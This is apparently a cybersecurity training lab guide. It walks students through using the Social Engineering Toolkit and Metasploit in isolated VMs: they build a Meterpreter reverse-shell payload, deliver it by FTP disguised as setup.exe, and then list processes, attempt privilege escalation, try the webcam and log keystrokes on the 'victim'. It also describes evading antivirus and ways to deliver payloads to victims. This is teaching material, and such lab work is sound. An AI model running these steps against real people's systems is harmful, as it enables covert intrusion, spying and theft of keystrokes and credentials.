Social engineering

 

Exercise 1 - Use the Social Engineering Toolkit (SET) in Kali Linux

With a little skillset, you can always break someone’s password using various methods, such as brute-force or dictionary attack. However, it is much easier to trick someone to simply share the password with you without them even knowing that they have shared it. You can also control their system without letting them know but you should trick them to install something or open a file, which contains a specific payload. When you perform such tricks with people, to share their confidential information or run a malicious file or payload, you are performing a social engineering attack, which is an art of manipulating people to perform a task that allows you to gain their confidential information or even control their system.

Please refer to your course material or use your favorite search engine to research for more information about this topic.

Task 1 - Create an Exploit

You can perform social engineering using various methods, such as simply talking to the people and tricking them or use sophisticated method with the help of the Social Engineering Toolkit (SET), which is a python-driven suite of custom tools that focus on attacking the human element.

Important: SET provides many tools. In this task, you will focus on specific tools but in your spare time, you are free to try all these tools to enhance your learning.

To use the SET, perform the following steps:

Step 1

Ensure you have powered on the required devices and connect to PLABKALI01.

Type root in the Username field.

Figure 1.1 Screenshot of PLABKALI01: Typing root into the username field on the login screen.

When prompted, type the following password in the Password field:

Passw0rd

Click Sign In.

Figure 1.2 Screenshot of PLABKALI01: Entering the password in the Password text box and then clicking Sign In.

Ensure that you have logged into the Kali Linux system.

Figure 1.3 Screenshot of PLABKALI01: Showing the taskbar that is correctly displayed once the viewer has been moved.

Step 2

You can start SET either from the menu or from the command prompt. To start from the menu, click the first icon from the task bar, select Exploitation Tools, and then select social engineering toolkit.

In this lab, you will use a command to start SET. On the toolbar, double-click Root Terminal.

Figure 1.4 Screenshot of PLABKALI01: Double-clicking the Root Terminal icon.

Step 3

The terminal window is displayed. Enter the following command and press Enter:

setoolkit

Figure 1.5 Screenshot of PLABKALI01: Executing the setoolkit command.

Step 4

If you are using SET for the first time, you need to accept the terms of service. Type the following letter and press Enter.

y

Figure 1.6 Screenshot of PLABKALI01: Accepting the terms of service to start the Social Engineering Toolkit (SET).

Step 5

You are now on the main menu. You will notice that there are multiple options displayed. Each option is designed to perform a specific task. For example, you can update the Social Engineering Toolkit by selecting the option 5.

To continue with this lab, you will need to select the 1) Social-Engineering Attacks option. Type the following number and press Enter:

1

Figure 1.7 Screenshot of PLABKALI01: Selecting the option 1 to choose the Social-Engineering Attacks.

Step 6

Next, you will see another menu that relate to the Social-Engineering Attacks option. Out of the given choices, you can choose 4) Create a Payload and Listener. Type the following number and press Enter:

4

Figure 1.8 Screenshot of PLABKALI01: Selecting the option 4 to create a payload and listener.

Step 7

Next, you will be prompted to select an option. Out of the given choices, you can choose 5) Windows Meterpreter Reverse_TCP X64. Type the following number and press Enter:

5

Figure 1.9 Screenshot of PLABKALI01: Selecting the option 5 to choose Windows Meterpreter Reverse payload.

Step 8

You will be prompted to provide the IP address for the payload listener. This is the IP address for your system, which is the Kali Linux. In this lab environment, the IP address for the Kali Linux is 192.168.0.3.

For the IP address for the payload listener option, enter the following IP address and press Enter:

192.168.0.3

Note: In the real environment, you will have a different IP address. You should not be using this IP address as it is applicable only in this lab environment. If you do not know the IP address of your Kali Linux, simply open another command prompt window, and run ifconfig. If you know the network adapter name, then you can run ifconfig eth0, where eth0 is the name of the network adapter. You will have to check your system.

Figure 1.10 Screenshot of PLABKALI01: Entering the IP address of the Kali Linux for the payload listener.

Step 9

Next, you will be prompted to enter the port number. Type the following port number in the Enter the PORT for the reverse listener option and press Enter:

443

Figure 1.11 Screenshot of PLABKALI01: Entering the port number for the reverse listener.

Step 10

Notice that the backdooring a legit executable process starts. An executable is now being packaged in a manner that the antivirus cannot detect it. After the executable is created, it is stored in the /root/.set. The default name for the file is payload.exe, which you will change after transporting it to the victim’s system.

You are now prompted to start the payload and listener. Type the following and press Enter:

yes

Figure 1.12 Screenshot of PLABKALI01: Entering YES to start the payload and listener.

The Metasploit framework now starts. You are now ready to move to the next level, which is sharing the payload with the victim and then capturing the information when the victim executes the payload.

Note: To be able to complete the next set of tasks in this exercise, you need to keep this console window open. Do NOT shut it down or exit from it.

You are now at the msf exploit (handler) prompt.

Figure 1.13 Screenshot of PLABKALI01: Showing the successful start of the payload handler.

Task 2 - Setup the FTP Server

After you have created the payload, you need to share it with the victim. In the real environment, you will have different methods of transporting this payload to the victim’s system. For example, some of the common transport methods are:

• E-mail - attach the payload with an E-mail and send it to the victim.
• USB - copy the payload in a USB and when the victim plugs-in the USB in the system, it can be triggered.
• Download - keep the infected file in a download repository from where the victim downloads the payload.
• FTP - Share it through FTP - making it look like a legitimate file.

In this task, you will setup an FTP server and share the file with the victim.

Important: SET provides many tools. In this task, you will focus on specific tools but in your spare time, you are free to try all these tools to enhance your learning.

To setup the FTP server, perform the following steps:

Step 1

Ensure that you have logged into the Kali Linux system and also ensure that the Metasploit window is opened. Notice that the payload handler is in running state.

Figure 1.14 Screenshot of PLABKALI01: Showing the successful start of the payload handler.

Step 2

Next, you need to first setup an FTP server. There are multiple options. Either you can setup an independent FTP server or use an auxiliary FTP server of the Metasploit. To setup the FTP server, type the following command and press Enter:

use auxiliary/server/ftp

Figure 1.15 Screenshot of PLABKALI01: Starting the auxiliary FTP server of the Metasploit.

Step 3

Notice that the command prompt is now changed to msf auxiliary(ftp). You need to now set the FTP root directory. To do this, type the following command and press Enter:

set FTPROOT /root/.set/

Figure 1.16 Screenshot of PLABKALI01: Setting the FTPROOT directory of the FTP server.

Step 4

Next, you need to type the following command and press Enter:

exploit

Note: If you miss this step, you will not be able to connect to the FTP server. This is a critical step.

Figure 1.17 Screenshot of PLABKALI01: Initiating the auxiliary module execution.

Step 5

Connect to PLABWIN10.

Note: Do not close the Metasploit window.

Figure 1.18 Screenshot of PLABWIN10: Showing the desktop screen of the Windows system.

Leave the devices you have powered on in their current state and proceed to the next task.

Task 3 - Download the Payload

After you have setup the FTP server, you need to next download the file on the victim’s system. You do not need an FTP client to download the file. In this task, you will use the Windows command prompt to connect to the FTP server.

Note: In the real environment, you will probably not be the one who will be downloading the file on the victim’s system. You will convince the victim to download the file. For the sake of completing this exercise, you will download the file from the FTP server to the victim’s system.

To download the payload, perform the following steps:

Step 1

Ensure that you have logged into PLABWIN10.

Figure 1.19 Screenshot of PLABWIN10: Showing the desktop screen of the Windows system.

Step 2

Right-click the Windows icon and select Run.

Figure 1.20 Screenshot of PLABWIN10: Selecting the Run options from the menu.

Step 3

The Run dialog box is displayed. In the Open textbox, type the following and press Enter:

cmd

Alternatively, you can click OK.

Figure 1.21 Screenshot of PLABWIN10: Showing the Run dialog box with the cmd command in the Open textbox.

Step 4

The command prompt window is displayed. You will now connect with the FTP server and download the file.

To connect with the FTP server, type the following command and press Enter:

ftp 192.168.0.3

Figure 1.22 Screenshot of PLABWIN10: Using the command prompt to connect with the FTP server 192.168.0.3.

Step 5

You are now connected with the FTP server. You will now authenticate as the anonymous user. Type the following name as the User and press Enter:

anonymous

Figure 1.23 Screenshot of PLABWIN10: Entering the user name as Anonymous to connect with the FTP server.

Step 6

Next, you are prompted for the password. Leave it blank and press Enter.

Figure 1.24 Screenshot of PLABWIN10: Entering the password to authenticate the Anonymous user.

You are now successfully authenticated with the FTP server.

Figure 1.25 Screenshot of PLABWIN10: Showing the successful connection with the FTP server 192.168.0.3.

Step 7

You need to now list the files on the FTP server. To be able to do this, type the following command and press Enter:

dir

Notice that the payload.exe is present on the FTP server.

Figure 1.26 Screenshot of PLABWIN10: Listing the files on the FTP server 192.168.0.3.

Step 8

Now, set the transfer to binary. Type the following command and press Enter:

binary

Type is now set to binary.

Figure 1.27 Screenshot of PLABWIN10: Setting the TYPE to binary.

Step 9

Next, transfer the file on to the victim’s system. Type the following command and press Enter:

get payload.exe

Notice that the transfer is successful.

Figure 1.28 Screenshot of PLABWIN10: Downloading the payload.exe file using the GET command.

Step 10

You can now safely close the FTP server. Type the following command and press Enter:

quit

Notice that the FTP prompt is now longer available. You are back on the command prompt.

Figure 1.29 Screenshot of PLABWIN10: Closing the session with the FTP server using the quit command.

Step 11

Open the Windows Explorer from the taskbar and navigate to the following path:

C:\Users\administrator.PRACTICELABS

Notice that the payload.exe file is present.

Figure 1.30 Screenshot of PLABWIN10: Showing the successful download of the payload.exe on the Windows system.

Step 12

Move the file to the Downloads folder by dragging it. You should then see the file in the Downloads folder.

Figure 1.31 Screenshot of PLABWIN10: Moving the file, payload.exe, to the Downloads folder.

Step 13

Navigate to the Downloads folder. Notice that the payload.exe is now present in this folder.

Figure 1.32 Screenshot of PLABWIN10: Showing the file, payload.exe, in the Downloads folder.

Step 14

After the file is moved, rename the file to setup.exe. Then, double-click the file to execute it.

Figure 1.33 Screenshot of PLABWIN10: Renaming the file, payload.exe, to setup.exe.

Quickly, switch back to PLABKALI01. Notice that the connection with the victim’s system is already opened.

Note: To be able to complete the next set of tasks in this exercise, you need to keep this console window open. Do NOT shut it down or exit from it.

Figure 1.34 Screenshot of PLABKALI01: Showing a successful connection with the victim’s system after the payload.exe file is executed.

Task 4 - Exploit the Victim’s System

The payload is now running on the victim’s system. You need to now exploit the victim’s system.

To exploit victim’s system, perform the following steps:

Step 1

Ensure that you are connected to the PLABKALI01. You need to now open the session with the victim’s system.

Type the following command and press Enter:

sessions -i 1

The session is now successfully established.

Figure 1.35 Screenshot of PLABKALI01: Showing a successful connection with the victim’s system after the payload.exe file is executed.

Step 2

Notice the interaction with the victim’s system has now started. You are now virtually controlling the victim’s system. Let’s see the processes that are running on the victim’s system.

Type the following command and press Enter:

ps

Notice that the processes running on the victim’s system are now displayed. It is important to note the last running process, setup.exe, which is the payload that you have executed on the victim’s system.

Figure 1.36 Screenshot of PLABKALI01: Listing the running processes on the victim’s system.

Step 3

Next, you need to escalate privileges. Type the following command press Enter:

getsystem

Notice the result. It shows a failure of privileges escalation.

Figure 1.37 Screenshot of PLABKALI01: Executing the getsystem command to escalate privileges on the victim’s system.

Step 4

Let’s now check if the victim’s system has a webcam and take a picture. To check this, enter the following command and press Enter:

webcam_snap

Notice the output, which states that victim’s system does not have a webcam.

Figure 1.38 Screenshot of PLABKALI01: Using the webcam on the victim’s system to take a picture.

Step 5

Let’s try to capture the keystrokes on the victim’s system. Type the following command and press Enter:

keyscan_start

Notice that the sniffer has now started.

Figure 1.39 Screenshot of PLABKALI01: Starting the keystroke sniffer on the victim’s system.

Step 6

Let’s now see the keys that have been pressed on the victim’s system. Type the following command and press Enter:

keyscan_dump

Notice that several keys were pressed since the sniffer has started.

Figure 1.40 Screenshot of PLABKALI01: Capturing the keystrokes on the victim’s system.

Step 7

Since the privilege escalation failed, you can try to do something else with the system. First, let’s background the session.

Type the following command and press Enter:

background

Notice that session 1 is now running in the background. Here, you can run more exploits if you desire. There are a lot of options available and you can explore them in your free time.

Figure 1.41 Screenshot of PLABKALI01: Putting the session into the background.

Shutdown all virtual machines used in this lab, before proceeding to the next module. Alternatively, you can log out of the lab platform.